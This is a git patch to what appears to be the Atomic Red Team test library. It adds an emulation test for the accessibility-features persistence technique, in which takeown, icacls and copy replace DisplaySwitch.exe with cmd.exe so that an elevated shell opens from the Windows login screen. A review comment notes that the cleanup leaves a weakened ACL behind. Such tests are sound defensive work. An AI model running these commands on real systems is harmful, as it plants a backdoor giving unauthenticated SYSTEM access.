From c1705f86e372d072493c2139174a4dcd86dad563 Mon Sep 17 00:00:00 2001
From: Casey Hennings
Date: Mon, 11 Aug 2025 21:05:08 -0400
Subject: [PATCH] Update T1546.008.yaml (#3136)
Co-authored-by: Bhavin Patel
---
 atomics/T1546.008/T1546.008.yaml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)
diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml
index 8f38324a..799f7f79 100644
--- a/atomics/T1546.008/T1546.008.yaml
+++ b/atomics/T1546.008/T1546.008.yaml
@@ -169,3 +169,18 @@ atomic_tests:
 copy /Y C:\Windows\System32\Narrator_backup.exe C:\Windows\System32\Narrator.exe
 name: command_prompt
 elevation_required: true
+- name: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe
+ description: |
+ Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt by pressing the Windows Key + P on the login screen.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd )
+ takeown /F C:\Windows\System32\DisplaySwitch.exe /A
+ icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t
+ copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
+ cleanup_command: |
+ copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
+ name: command_prompt
+ elevation_required: true
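Review bot: The `cleanup_command` only copies DisplaySwitch_backup.exe back over the target, so the owner change from `takeown /A` and the `Administrators:F` grant on C:\Windows\System32\DisplaySwitch.exe appear to persist after the test. That leaves the host with a weaker ACL on a System32 binary than it started with. Cleanup should restore the owner, e.g. `icacls C:\Windows\System32\DisplaySwitch.exe /setowner "NT SERVICE\TrustedInstaller"` (presumably the original owner; confirm on a clean image). The command block could also save the DACL with `icacls ... /save` before the grant so that cleanup can `/restore` it. Separately, `/t` does nothing on a single file, and the literal group name `Administrators` will not resolve on non-English Windows, where `/grant *S-1-5-32-544:F` is the locale-independent form.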